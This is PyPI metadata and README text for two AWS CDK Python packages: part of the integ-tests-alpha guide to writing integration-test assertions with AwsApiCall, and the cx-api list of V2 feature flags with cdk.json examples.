Or by using the `awsApiCall` method on `DeployAssert` (when writing integration tests):

```python
# app: App
# stack: Stack

integ = IntegTest(app, "Integ",
    test_cases=[stack]
)
integ.assertions.aws_api_call("SQS", "receiveMessage", {
    "QueueUrl": "url"
})
```

You must specify the `service` and the `api` when using the `AwsApiCall` construct. The `service` is the name of an AWS service, in one of the following forms:

* An AWS SDK for JavaScript v3 package name (`@aws-sdk/client-api-gateway`)
* An AWS SDK for JavaScript v3 client name (`api-gateway`)
* An AWS SDK for JavaScript v2 constructor name (`APIGateway`)
* A lowercase AWS SDK for JavaScript v2 constructor name (`apigateway`)

The `api` is the name of an AWS API call, in one of the following forms:

* An API call name as found in the API Reference documentation (`GetObject`)
* The API call name starting with a lowercase letter (`getObject`)
* The AWS SDK for JavaScript v3 command class name (`GetObjectCommand`)

By default, the `AwsApiCall` construct will automatically add the correct IAM policies to allow the Lambda function to make the API call. It does this based on the `service` and `api` that is provided.
In the above example the service is `SQS` and the api is `receiveMessage`, so it will create a policy with `Action: 'sqs:ReceiveMessage'`.

There are some cases where the permissions do not exactly match the service/api call, for example the S3 `listObjectsV2` api. In these cases it is possible to add the correct policy by accessing the `provider` object.

```python
# app: App
# stack: Stack
# integ: IntegTest

api_call = integ.assertions.aws_api_call("S3", "listObjectsV2", {
    "Bucket": "mybucket"
})

api_call.provider.add_to_role_policy({
    "Effect": "Allow",
    "Action": ["s3:GetObject", "s3:ListBucket"],
    "Resource": ["*"]
})
```

When executing `waitForAssertions()`, it is necessary to add an IAM policy using `waiterProvider.addToRolePolicy()`. Because `IApiCall` does not have a `waiterProvider` property, you need to cast it to `AwsApiCall`.

```python
# integ: IntegTest

api_call = integ.assertions.aws_api_call("S3", "listObjectsV2", {
    "Bucket": "mybucket"
}).wait_for_assertions()

api_call.waiter_provider.add_to_role_policy({
    "Effect": "Allow",
    "Action": ["s3:GetObject", "s3:ListBucket"],
    "Resource": ["*"]
})
```

Note that `addToRolePolicy()` uses direct IAM JSON policy blobs, *not* a `iam.PolicyStatement` object like you will see in the rest of the CDK.

### EqualsAssertion

This library currently provides the ability to assert that two values are equal to one another by utilizing the `EqualsAssertion` class. This utilizes a Lambda backed `CustomResource` which in turn uses the [Match](https://docs.aws.amazon.com/cdk/api/v2/docs/aws-cdk-lib.assertions.Match.html) utility from the [@aws-cdk/assertions](https://docs.aws.amazon.com/cdk/api/v2/docs/aws-cdk-lib.assertions-readme.html) library.
```python import json # app: App # stack: Stack # queue: sqs.Queue # fn: lambda.IFunction integ = IntegTest(app, "Integ", test_cases=[stack] ) integ.assertions.invoke_function( function_name=fn.function_name, invocation_type=InvocationType.EVENT, payload=json.dumps({"status": "OK"}) ) message = integ.assertions.aws_api_call("SQS", "receiveMessage", { "QueueUrl": queue.queue_url, "WaitTimeSeconds": 20 }) message.assert_at_path("Messages.0.Body", ExpectedResult.object_like({ "requestContext": { "condition": "Success" }, "requestPayload": { "status": "OK" }, "responseContext": { "statusCode": 200 }, "responsePayload": "success" })) ``` #### Match `integ-tests` also provides a `Match` utility similar to the `@aws-cdk/assertions` module. `Match` can be used to construct the `ExpectedResult`. While the utility is similar, only a subset of methods are currently available on the `Match` utility of this module: `arrayWith`, `objectLike`, `stringLikeRegexp` and `serializedJson`. ```python # message: AwsApiCall message.expect(ExpectedResult.object_like({ "Messages": Match.array_with([{ "Payload": Match.serialized_json({"key": "value"}) }, { "Body": { "Values": Match.array_with([{"Asdf": 3}]), "Message": Match.string_like_regexp("message") } } ]) })) ``` ### Examples #### Invoke a Lambda Function In this example there is a Lambda Function that is invoked and we assert that the payload that is returned is equal to '200'. ```python # lambda_function: lambda.IFunction # app: App stack = Stack(app, "cdk-integ-lambda-bundling") integ = IntegTest(app, "IntegTest", test_cases=[stack] ) invoke = integ.assertions.invoke_function( function_name=lambda_function.function_name ) invoke.expect(ExpectedResult.object_like({ "Payload": "200" })) ``` The above example will by default create a CloudWatch log group that never expires. If you want to configure it with custom log retention days, you need to specify the `logRetention` property.
```python import aws_cdk.aws_logs as logs # lambda_function: lambda.IFunction # app: App stack = Stack(app, "cdk-integ-lambda-bundling") integ = IntegTest(app, "IntegTest", test_cases=[stack] ) invoke = integ.assertions.invoke_function( function_name=lambda_function.function_name, log_retention=logs.RetentionDays.ONE_WEEK ) ``` #### Make an AWS API Call In this example there is a StepFunctions state machine that is executed and then we assert that the result of the execution is successful. ```python # app: App # stack: Stack # sm: IStateMachine test_case = IntegTest(app, "IntegTest", test_cases=[stack] ) # Start an execution start = test_case.assertions.aws_api_call("StepFunctions", "startExecution", { "stateMachineArn": sm.state_machine_arn }) # describe the results of the execution describe = test_case.assertions.aws_api_call("StepFunctions", "describeExecution", { "executionArn": start.get_att_string("executionArn") }) # assert the results describe.expect(ExpectedResult.object_like({ "status": "SUCCEEDED" })) ``` #### Chain ApiCalls Sometimes it may be necessary to chain API Calls. Since each API call is its own resource, all you need to do is add a dependency between the calls. There is a helper method `next` that can be used. ```python # integ: IntegTest integ.assertions.aws_api_call("S3", "putObject", { "Bucket": "amzn-s3-demo-bucket", "Key": "my-key", "Body": "helloWorld" }).next(integ.assertions.aws_api_call("S3", "getObject", { "Bucket": "amzn-s3-demo-bucket", "Key": "my-key" })) ``` #### Wait for results A common use case when performing assertions is to wait for a condition to pass. Sometimes the thing that you are asserting against is not done provisioning by the time the assertion runs. In these cases it is possible to run the assertion asynchronously by calling the `waitForAssertions()` method.
Taking the example above of executing a StepFunctions state machine, depending on the complexity of the state machine, it might take a while for it to complete. ```python # app: App # stack: Stack # sm: IStateMachine test_case = IntegTest(app, "IntegTest", test_cases=[stack] ) # Start an execution start = test_case.assertions.aws_api_call("StepFunctions", "startExecution", { "stateMachineArn": sm.state_machine_arn }) # describe the results of the execution describe = test_case.assertions.aws_api_call("StepFunctions", "describeExecution", { "executionArn": start.get_att_string("executionArn") }).expect(ExpectedResult.object_like({ "status": "SUCCEEDED" })).wait_for_assertions() ``` When you call `waitForAssertions()` the assertion provider will continuously make the `awsApiCall` until the `ExpectedResult` is met. You can also control the parameters for waiting, for example: ```python # test_case: IntegTest # start: IApiCall describe = test_case.assertions.aws_api_call("StepFunctions", "describeExecution", { "executionArn": start.get_att_string("executionArn") }).expect(ExpectedResult.object_like({ "status": "SUCCEEDED" })).wait_for_assertions( total_timeout=Duration.minutes(5), interval=Duration.seconds(15), backoff_rate=3 ) ```
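The waiter parameters above translate to an exponential polling schedule. A minimal sketch of the timing, assuming the provider multiplies the interval by `backoffRate` after each attempt and stops once the total timeout would be exceeded (`polling_waits` is an illustrative helper, not the actual provider code):

```python
from datetime import timedelta

def polling_waits(interval: timedelta, backoff_rate: float, total_timeout: timedelta):
    # Illustrative only: yield successive wait times, growing by backoff_rate,
    # until the cumulative waiting time would exceed the total timeout.
    elapsed = timedelta(0)
    wait = interval
    while elapsed + wait <= total_timeout:
        yield wait
        elapsed += wait
        wait = wait * backoff_rate

# interval=15s, backoffRate=3, totalTimeout=5min -> waits of 15s, 45s, 135s
waits = list(polling_waits(timedelta(seconds=15), 3, timedelta(minutes=5)))
```

Under these assumptions, a `backoffRate` of 1 gives fixed-interval polling, and larger rates trade polling granularity for fewer API calls.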
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:22.587217
aws_cdk_integ_tests_alpha-2.239.0a0.tar.gz
761,611
f5/b5/1c9d091623d3007cb31263f683073cb116fabaa4bb1ef45c91e6f4365db4/aws_cdk_integ_tests_alpha-2.239.0a0.tar.gz
source
sdist
null
false
06884f5d1d7a3b66b4f2810ec71ffff1
80eead91c8bda50602b038b9b7b7985358bce68cb3d3da87e434c57e95318158
f5b51c9d091623d3007cb31263f683073cb116fabaa4bb1ef45c91e6f4365db4
null
[]
0
2.1
aws-cdk.cx-api
2.239.0
Cloud executable protocol
# Cloud Executable API This module is part of the [AWS Cloud Development Kit](https://github.com/aws/aws-cdk) project. ## V2 Feature Flags * `@aws-cdk/aws-s3:createDefaultLoggingPolicy` Enable this feature flag to create an S3 bucket policy by default in cases where an AWS service would automatically create the Policy if one does not exist. For example, in order to send VPC flow logs to an S3 bucket, there is a specific Bucket Policy that needs to be attached to the bucket. If you create the bucket without a policy and then add the bucket as the flow log destination, the service will automatically create the bucket policy with the necessary permissions. If you were to then try and add your own bucket policy CloudFormation will throw an error indicating that a bucket policy already exists. In cases where we know what the required policy is we can go ahead and create the policy so we can remain in control of it. [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/AWS-logs-and-resource-policy.html#AWS-logs-infrastructure-S3](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/AWS-logs-and-resource-policy.html#AWS-logs-infrastructure-S3) *cdk.json* ```json { "context": { "@aws-cdk/aws-s3:createDefaultLoggingPolicy": true } } ``` * `@aws-cdk/aws-sns-subscriptions:restrictSqsDescryption` Enable this feature flag to restrict the decryption of an SQS queue, which is subscribed to an SNS topic, to only the topic which it is subscribed to and not the whole SNS service of an account. Previously the decryption was only restricted to the SNS service principal. To make the SQS subscription more secure, it is a good practice to restrict the decryption further and only allow the connected SNS topic to decrypt the subscribed queue.
*cdk.json* ```json { "context": { "@aws-cdk/aws-sns-subscriptions:restrictSqsDescryption": true } } ``` * `@aws-cdk/aws-apigateway:disableCloudWatchRole` Enable this feature flag to change the default behavior for aws-apigateway.RestApi and aws-apigateway.SpecRestApi to *not* create a CloudWatch role and Account. There is only a single ApiGateway account per AWS environment which means that each time you create a RestApi in your account the ApiGateway account is overwritten. If at some point the newest RestApi is deleted, the ApiGateway Account and CloudWatch role will also be deleted, breaking any existing ApiGateways that were depending on them. When this flag is enabled you should either create the ApiGateway account and CloudWatch role separately *or* only enable the cloudWatchRole on a single RestApi. *cdk.json* ```json { "context": { "@aws-cdk/aws-apigateway:disableCloudWatchRole": true } } ``` * `@aws-cdk/core:enablePartitionLiterals` Enable this feature flag to have `Stack.partition` return a literal string for a stack's partition when the stack has a known region configured. If the region is undefined, or set to an unknown value, the `Stack.partition` will be the CloudFormation intrinsic value `AWS::Partition`. Without this feature flag, `Stack.partition` always returns the CloudFormation intrinsic value `AWS::Partition`. This feature will often simplify ARN strings in CDK generated templates, for example: ```yaml Principal: AWS: Fn::Join: - "" - - "arn:" - Ref: AWS::Partition - :iam::123456789876:root ``` becomes: ```yaml Principal: AWS: "arn:aws:iam::123456789876:root" ``` * `@aws-cdk/aws-ecs:disableExplicitDeploymentControllerForCircuitBreaker` Enable this feature flag to avoid setting the "ECS" deployment controller when adding a circuit breaker to an ECS Service, as this will trigger a full replacement which fails to deploy when using set service names.
This does not change any behaviour as the default deployment controller when it is not defined is ECS. *cdk.json* ```json { "context": { "@aws-cdk/aws-ecs:disableExplicitDeploymentControllerForCircuitBreaker": true } } ``` * `@aws-cdk/aws-s3:serverAccessLogsUseBucketPolicy` Enable this feature flag to use S3 Bucket Policy for granting permission for Server Access Logging rather than using the canned `LogDeliveryWrite` ACL. ACLs do not work when Object Ownership is enabled on the bucket. This flag uses a Bucket Policy statement to allow Server Access Log delivery, following best practices for S3. [https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-server-access-logging.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-server-access-logging.html) ```json { "context": { "@aws-cdk/aws-s3:serverAccessLogsUseBucketPolicy": true } } ``` * `@aws-cdk/aws-rds:databaseProxyUniqueResourceName` Enable this feature flag to use unique resource names for each `DatabaseProxy`. Previously, the default behavior for `DatabaseProxy` was to use `id` of the constructor for `dbProxyName`. In this case, users couldn't deploy `DatabaseProxy`s that have the same `id` in the same region. This is a feature flag as the old behavior was technically incorrect, but users may have come to depend on it. ```json { "context": { "@aws-cdk/aws-rds:databaseProxyUniqueResourceName": true } } ``` * `@aws-cdk/aws-redshift:columnId` Enable this feature flag to allow the CDK to track changes in Redshift columns through their `id` attribute. This is a breaking change, as the `name` attribute was currently being used to track changes to Redshift columns. Enabling this feature flag comes at a risk for existing Redshift columns, as the `name` attribute of a Redshift column was currently being used. Therefore, changing a Redshift column's `name` will essentially create a new column and delete the old one. This will cause data loss.
If you choose to enable this flag, ensure that upon initial deployment (the first deployment after setting this feature flag), the `name` attribute of every column is not changed. After the initial deployment, you can freely change the `name` attribute of a column. *cdk.json* ```json { "context": { "@aws-cdk/aws-redshift:columnId": true } } ``` * `@aws-cdk/aws-stepfunctions-tasks:enableEmrServicePolicyV2` Enable this feature flag to use the `AmazonEMRServicePolicy_v2` managed policies for the EMR service role. This is a feature flag as the old behavior will be deprecated, but some resources may require manual intervention since they might not have the appropriate tags propagated automatically. [https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-managed-iam-policies.html](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-managed-iam-policies.html) *cdk.json* ```json { "context": { "@aws-cdk/aws-stepfunctions-tasks:enableEmrServicePolicyV2": true } } ``` * `@aws-cdk/core:includePrefixInUniqueNameGeneration` Enable this feature flag to include the stack's prefixes in the name generation process. Not doing so can cause the name of the stack to exceed 128 characters: * The name generation ensures it doesn't exceed 128 characters * Without this feature flag, the prefix is prepended to the generated name, and the result can exceed 128 characters This is a feature flag as it changes the name generated for stacks. Any CDK application deployed prior to this fix will most likely be generated with a new name, causing the stack to be recreated with the new name, and then deleting the old one. For applications running on production environments this can be unmanageable. *cdk.json* ```json { "context": { "@aws-cdk/core:includePrefixInUniqueNameGeneration": true } } ``` * `@aws-cdk/aws-lambda-nodejs:useLatestRuntimeVersion` Enable this feature flag to automatically use the latest available NodeJS version in the `aws-lambda-nodejs.Function` construct.
This allows creation of new functions using a version that will automatically stay up to date without breaking bundling of existing functions that externalize packages included in their environment such as `aws-sdk`. Functions defined previously will continue to function correctly as long as they pass an explicit runtime version, or do not exclude packages during bundling. *cdk.json* ```json { "context": { "@aws-cdk/aws-lambda-nodejs:useLatestRuntimeVersion": true } } ``` * `@aws-cdk/aws-codepipeline-actions:useNewDefaultBranchForCodeCommitSource` Enable this feature flag to update the default branch for CodeCommit source actions to `main`. Previously, the default branch for CodeCommit source actions was set to `master`. However, this convention is no longer supported, and repositories created after March 2021 now have `main` as their default branch. *cdk.json* ```json { "context": { "@aws-cdk/aws-codepipeline-actions:useNewDefaultBranchForCodeCommitSource": true } } ``` * `@aws-cdk/aws-cloudwatch-actions:changeLambdaPermissionLogicalIdForLambdaAction` Enable this feature flag to change the logical ID of the `LambdaPermission` for the `LambdaAction` to include an alarm ID. Previously, only one alarm with the `LambdaAction` could be created per Lambda. This flag allows multiple alarms with the `LambdaAction` for the same Lambda to be created. *cdk.json* ```json { "context": { "@aws-cdk/aws-cloudwatch-actions:changeLambdaPermissionLogicalIdForLambdaAction": true } } ``` * `@aws-cdk/aws-codepipeline:crossAccountKeysDefaultValueToFalse` Enables Pipeline to set the default value for `crossAccountKeys` to false. When this feature flag is enabled, and the `crossAccountKeys` property is not provided in a `Pipeline` construct, the construct automatically defaults the value of this property to false.
*cdk.json* ```json { "context": { "@aws-cdk/aws-codepipeline:crossAccountKeysDefaultValueToFalse": true } } ``` * `@aws-cdk/aws-codepipeline:defaultPipelineTypeToV2` Enables Pipeline to set the default pipeline type to V2. When this feature flag is enabled, and the `pipelineType` property is not provided in a `Pipeline` construct, the construct automatically defaults the value of this property to `PipelineType.V2`. *cdk.json* ```json { "context": { "@aws-cdk/aws-codepipeline:defaultPipelineTypeToV2": true } } ``` * `@aws-cdk/aws-kms:reduceCrossAccountRegionPolicyScope` Reduce resource scope of the IAM Policy created from KMS key grant to granting key only. When this feature flag is enabled and calling KMS key grant method, the created IAM policy will reduce the resource scope from '*' to this specific granting KMS key. *cdk.json* ```json { "context": { "@aws-cdk/aws-kms:reduceCrossAccountRegionPolicyScope": true } } ``` * `@aws-cdk/aws-kms:applyImportedAliasPermissionsToPrincipal` Enable grant methods on imported KMS Aliases to apply permissions scoped by the alias using the `kms:ResourceAliases` condition key. When this flag is disabled, grant* methods on `Alias.fromAliasName` remain no-ops to preserve existing behavior. *cdk.json* ```json { "context": { "@aws-cdk/aws-kms:applyImportedAliasPermissionsToPrincipal": true } } ``` * `@aws-cdk/aws-eks:nodegroupNameAttribute` When enabled, nodegroupName attribute of the provisioned EKS NodeGroup will not have the cluster name prefix. When this feature flag is enabled, the nodegroupName attribute will be exactly the name of the nodegroup without any prefix. *cdk.json* ```json { "context": { "@aws-cdk/aws-eks:nodegroupNameAttribute": true } } ``` * `@aws-cdk/aws-ec2:ebsDefaultGp3Volume` When enabled, the default volume type of the EBS volume will be GP3. 
When this feature flag is enabled, the default volume type of the EBS volume will be `EbsDeviceVolumeType.GENERAL_PURPOSE_SSD_GP3`. *cdk.json* ```json { "context": { "@aws-cdk/aws-ec2:ebsDefaultGp3Volume": true } } ``` * `@aws-cdk/aws-ecs:removeDefaultDeploymentAlarm` When enabled, remove default deployment alarm settings. When this feature flag is enabled, remove the default deployment alarm settings when creating an AWS ECS service. *cdk.json* ```json { "context": { "@aws-cdk/aws-ecs:removeDefaultDeploymentAlarm": true } } ``` * `@aws-cdk/aws-stepfunctions-tasks:ecsReduceRunTaskPermissions` When enabled, IAM Policy created to run tasks won't include the task definition ARN, only the revision ARN. When this feature flag is enabled, the IAM Policy created to run tasks won't include the task definition ARN, only the revision ARN. The revision ARN is more specific than the task definition ARN. See [https://docs.aws.amazon.com/step-functions/latest/dg/ecs-iam.html](https://docs.aws.amazon.com/step-functions/latest/dg/ecs-iam.html) for more details. *cdk.json* ```json { "context": { "@aws-cdk/aws-stepfunctions-tasks:ecsReduceRunTaskPermissions": true } } ``` * `@aws-cdk/aws-stepfunctions-tasks:useNewS3UriParametersForBedrockInvokeModelTask` When enabled, use new props for S3 URI under `input` and `output` fields in task definition of state machine for Bedrock invoke model. When this feature flag is enabled, use newly introduced props `s3InputUri` and `s3OutputUri` to populate S3 URI under input and output fields in state machine task definition for Bedrock invoke model. *cdk.json* ```json { "context": { "@aws-cdk/aws-stepfunctions-tasks:useNewS3UriParametersForBedrockInvokeModelTask": true } } ``` * `@aws-cdk/aws-ecs:reduceEc2FargateCloudWatchPermissions` Currently, we will automatically add a number of CloudWatch permissions to the task role when no CloudWatch log group is specified as logConfiguration and it will grant 'Resources': ['*'] to the task role.
When this feature flag is enabled, we will only grant the necessary permissions when users specify a CloudWatch log group. *cdk.json* ```json { "context": { "@aws-cdk/aws-ecs:reduceEc2FargateCloudWatchPermissions": true } } ``` * `@aws-cdk/aws-ec2:ec2SumTImeoutEnabled` Currently, if both initOptions.timeout and resourceSignalTimeout are specified in the options for creating an EC2 Instance, only the value from 'resourceSignalTimeout' will be used. When this feature flag is enabled, if both initOptions.timeout and resourceSignalTimeout are specified, the values will be summed together. *cdk.json* ```json { "context": { "@aws-cdk/aws-ec2:ec2SumTImeoutEnabled": true } } ``` * `@aws-cdk/aws-appsync:appSyncGraphQLAPIScopeLambdaPermission` Currently, when using a Lambda authorizer with an AppSync GraphQL API, the AWS CDK automatically generates the necessary AWS::Lambda::Permission to allow the AppSync API to invoke the Lambda authorizer. This permission is overly permissive because it lacks a SourceArn, meaning it allows invocations from any source. When this feature flag is enabled, the AWS::Lambda::Permission will be properly scoped with the SourceArn corresponding to the specific AppSync GraphQL API. *cdk.json* ```json { "context": { "@aws-cdk/aws-appsync:appSyncGraphQLAPIScopeLambdaPermission": true } } ``` * `@aws-cdk/aws-rds:setCorrectValueForDatabaseInstanceReadReplicaInstanceResourceId` When enabled, the value of property `instanceResourceId` in construct `DatabaseInstanceReadReplica` will be set to the correct value, which is `DbiResourceId`, instead of the current `DbInstanceArn`. When this feature flag is enabled, the value of that property will be set to the `DbiResourceId` attribute as expected, and that will fix the `grantConnect` method.
*cdk.json* ```json { "context": { "@aws-cdk/aws-rds:setCorrectValueForDatabaseInstanceReadReplicaInstanceResourceId": true } } ``` * `@aws-cdk/aws-lambda-nodejs:sdkV3ExcludeSmithyPackages` Currently, when bundling Lambda functions with the non-latest runtime that supports AWS SDK JavaScript (v3), only the `@aws-sdk/*` packages are excluded by default. However, this can cause version mismatches between the `@aws-sdk/*` and `@smithy/*` packages, as they are tightly coupled dependencies in AWS SDK v3. When this feature flag is enabled, both `@aws-sdk/*` and `@smithy/*` packages will be excluded during the bundling process. This ensures that no mismatches occur between these tightly coupled dependencies when using the AWS SDK v3 in Lambda functions. *cdk.json* ```json { "context": { "@aws-cdk/aws-lambda-nodejs:sdkV3ExcludeSmithyPackages": true } } ``` * `@aws-cdk/aws-dynamodb:resourcePolicyPerReplica` If this flag is not set, the default behavior for `TableV2` is to use a different `resourcePolicy` for each replica. If this flag is set to false, the behavior is that each replica shares the same `resourcePolicy` as the source table. This will prevent you from creating a new table which has an additional replica and a resource policy. This is a feature flag as the old behavior was technically incorrect but users may have come to depend on it. *cdk.json* ```json { "context": { "@aws-cdk/aws-dynamodb:resourcePolicyPerReplica": false, }, } ``` * `@aws-cdk/aws-route53-targets:userPoolDomainNameMethodWithoutCustomResource` When enabled, use a new method for DNS Name of user pool domain target without creating a custom resource. When this feature flag is enabled, a new method will be used to get the DNS Name of the user pool domain target. The old method creates a custom resource internally, but the new method doesn't need a custom resource. If the flag is set to false then a custom resource will be created when using `UserPoolDomainTarget`. 
*cdk.json* ```json { "context": { "@aws-cdk/aws-route53-targets:userPoolDomainNameMethodWithoutCustomResource": true } } ``` * `@aws-cdk/aws-elasticloadbalancingV2:albDualstackWithoutPublicIpv4SecurityGroupRulesDefault` When enabled, the default security group ingress rules will allow IPv6 ingress from anywhere. For internet-facing ALBs with `dualstack-without-public-ipv4` IP address type, the default security group rules will allow IPv6 ingress from anywhere (::/0). Previously, the default security group rules would only allow IPv4 ingress. Using a feature flag to make sure existing customers who might be relying on the overly restrictive permissions are not broken. If the flag is set to false then the default security group rules will only allow IPv4 ingress. *cdk.json* ```json { "context": { "@aws-cdk/aws-elasticloadbalancingV2:albDualstackWithoutPublicIpv4SecurityGroupRulesDefault": true } } ``` * `@aws-cdk/aws-iam:oidcRejectUnauthorizedConnections` When this feature flag is enabled, the OIDC Provider's custom resource handler will by default reject unauthorized connections when downloading CA Certificates. When this feature flag is disabled, the behaviour will be the same as the current behaviour and will allow downloading thumbprints from insecure connections. *cdk.json* ```json { "context": { "@aws-cdk/aws-iam:oidcRejectUnauthorizedConnections": true } } ``` * `@aws-cdk/core:enableAdditionalMetadataCollection` When this feature flag is enabled, CDK expands the scope of usage data collection to include: * L2 construct property keys - Collect which property keys you use from the L2 constructs in your app. This includes property keys nested in dictionary objects. * L2 construct property values of BOOL and ENUM types - Collect property key values of only BOOL and ENUM types. All other types, such as string values or construct references will be redacted.
* L2 construct method usage - Collect method name, parameter keys, and parameter values of BOOL and ENUM types. *cdk.json* ```json { "context": { "@aws-cdk/core:enableAdditionalMetadataCollection": true } } ``` * `@aws-cdk/aws-lambda:createNewPoliciesWithAddToRolePolicy` [Deprecated default feature] When this feature flag is enabled, Lambda will create new inline policies with AddToRolePolicy. The purpose of this is to prevent lambda from creating a dependency on the Default Policy Statement. This solves an issue where a circular dependency could occur if adding lambda to something like a Cognito Trigger, then adding the User Pool to the lambda execution role permissions. However in the current implementation, we have removed a dependency of the lambda function on the policy. In addition to this, a Role will be attached to the Policy instead of an inline policy being attached to the role. This will create a data race condition in the CloudFormation template because the creation of the Lambda function no longer waits for the policy to be created. Having said that, we are not deprecating the feature (we are defaulting the feature flag to false for new stacks) since this feature can still be used to get around the circular dependency issue (issue-7016) particularly in cases where the lambda resource creation doesn't need to depend on the policy resource creation. We recommend unsetting the feature flag if already set, which will restore the original behavior. *cdk.json* ```json { "context": { "@aws-cdk/aws-lambda:createNewPoliciesWithAddToRolePolicy": false } } ``` * `@aws-cdk/aws-s3:setUniqueReplicationRoleName` When this feature flag is enabled, a unique role name is specified only when performing cross-account replication. When disabled, 'CDKReplicationRole' is always specified.
*cdk.json* ```json { "context": { "@aws-cdk/aws-s3:setUniqueReplicationRoleName": true } } ``` * `@aws-cdk/pipelines:reduceStageRoleTrustScope` When this feature flag is enabled, the root account principal will not be added to the trust policy of the stage role. When this feature flag is disabled, it will keep the root account principal in the trust policy. *cdk.json* ```json { "context": { "@aws-cdk/pipelines:reduceStageRoleTrustScope": true } } ``` * `@aws-cdk/aws-events:requireEventBusPolicySid` When this flag is enabled: * Resource policies will be created with Statement IDs for service principals * The operation will succeed as expected When this flag is disabled: * A warning will be emitted * The grant operation will be dropped * No permissions will be added *cdk.json* ```json { "context": { "@aws-cdk/aws-events:requireEventBusPolicySid": true } } ``` * `@aws-cdk/aws-dynamodb:retainTableReplica` Currently, the table replica will always be deleted when the stack is deleted, regardless of the source table's deletion policy. When enabled, the table replica will default to the removal policy of the source table unless specified otherwise. *cdk.json* ```json { "context": { "@aws-cdk/aws-dynamodb:retainTableReplica": true } } ``` * `@aws-cdk/cognito:logUserPoolClientSecretValue` When this feature flag is enabled, the SDK API call response to describe user pool client values will be logged in the custom resource lambda function logs. When this feature flag is disabled, the SDK API call response to describe user pool client values will not be logged in the custom resource lambda function logs. *cdk.json* ```json { "context": { "@aws-cdk/cognito:logUserPoolClientSecretValue": true } } ``` * `@aws-cdk/aws-s3:publicAccessBlockedByDefault` When BlockPublicAccess is not set at all, S3's default behavior will be to set all options to true in the AWS console.
The previous behavior in cdk before this feature was: if only some of the BlockPublicAccessOptions were set (not all 4), then the ones undefined would default to false. This is counterintuitive to the console behavior where the options would start in true state and a user would uncheck the boxes as needed. The new behavior from this feature will allow a user, for example, to set 1 of the 4 BlockPublicAccessOptions to false, and on deployment the other 3 will remain true. *cdk.json* ```json { "context": { "@aws-cdk/aws-s3:publicAccessBlockedByDefault": true } } ``` * `@aws-cdk/aws-ec2:requirePrivateSubnetsForEgressOnlyInternetGateway` When this feature flag is enabled, EgressOnlyGateway is created only for dual-stack VPC with private subnets. When this feature flag is disabled, EgressOnlyGateway resource is created for all dual-stack VPC regardless of subnet type. *cdk.json* ```json { "context": { "@aws-cdk/aws-ec2:requirePrivateSubnetsForEgressOnlyInternetGateway": true } } ``` * `@aws-cdk/aws-stepfunctions-tasks:httpInvokeDynamicJsonPathEndpoint` When this feature flag is enabled, the JSONPath apiEndpoint value will be resolved dynamically at runtime, while slightly increasing the size of the state machine definition. When disabled, the JSONPath apiEndpoint property will only support a static string value. *cdk.json* ```json { "context": { "@aws-cdk/aws-stepfunctions-tasks:httpInvokeDynamicJsonPathEndpoint": true } } ``` * `@aws-cdk/aws-signer:signingProfileNamePassedToCfn` When this feature flag is enabled, the `signingProfileName` property is passed to the L1 `CfnSigningProfile` construct, which ensures that the AWS Signer profile is created with the specified name. When this feature flag is disabled, the `signingProfileName` is not passed to CloudFormation, maintaining backward compatibility with existing deployments where CloudFormation auto-generated profile names.
This feature flag is needed because enabling it can cause existing signing profiles to be replaced during deployment if a `signingProfileName` was specified but not previously used in the CloudFormation template. *cdk.json* ```json { "context": { "@aws-cdk/aws-signer:signingProfileNamePassedToCfn": true } } ``` * `@aws-cdk/aws-ecs-patterns:uniqueTargetGroupId` When enabled, ECS patterns will generate unique target group IDs that include the load balancer name and type (public/private). This prevents CloudFormation conflicts when switching between public and private load balancers. Without this flag, switching an ApplicationLoadBalancedFargateService from public to private (or vice versa) fails with "target group cannot be associated with more than one load balancer" error. *cdk.json* ```json { "context": { "@aws-cdk/aws-ecs-patterns:uniqueTargetGroupId": true } } ```
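All of these flags are plain context values in `cdk.json`, so a quick sanity check of a project's flag settings can be sketched with ordinary JSON tooling. The helper below is hypothetical; inside a CDK app you would instead use `FeatureFlags.of(scope).is_enabled(...)` from `aws-cdk-lib`:

```python
import json

def flag_enabled(cdk_json_text: str, flag: str, default: bool = False) -> bool:
    # Hypothetical helper: read one feature flag from the "context" block
    # of a cdk.json file, falling back to a default when it is unset.
    context = json.loads(cdk_json_text).get("context", {})
    return bool(context.get(flag, default))

cdk_json = '{"context": {"@aws-cdk/aws-s3:createDefaultLoggingPolicy": true}}'
print(flag_enabled(cdk_json, "@aws-cdk/aws-s3:createDefaultLoggingPolicy"))  # True
print(flag_enabled(cdk_json, "@aws-cdk/aws-redshift:columnId"))              # False
```

Note that the effective default for an unset flag depends on the CDK version that created the project, so the `default` parameter here is only a stand-in.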
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk.cloud-assembly-schema>=50.3.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:21.740279
aws_cdk_cx_api-2.239.0.tar.gz
374,222
08/aa/603c8d470377b90af250b7dc39032f1dc1793a715dfdc4d4ae4eb250074e/aws_cdk_cx_api-2.239.0.tar.gz
source
sdist
null
false
df273a44f4b6219e70304a7dbd4d157d
17b92957de1d42e3851af1710ebb16a1be1b34237cf2fc9415c424d594b90bfa
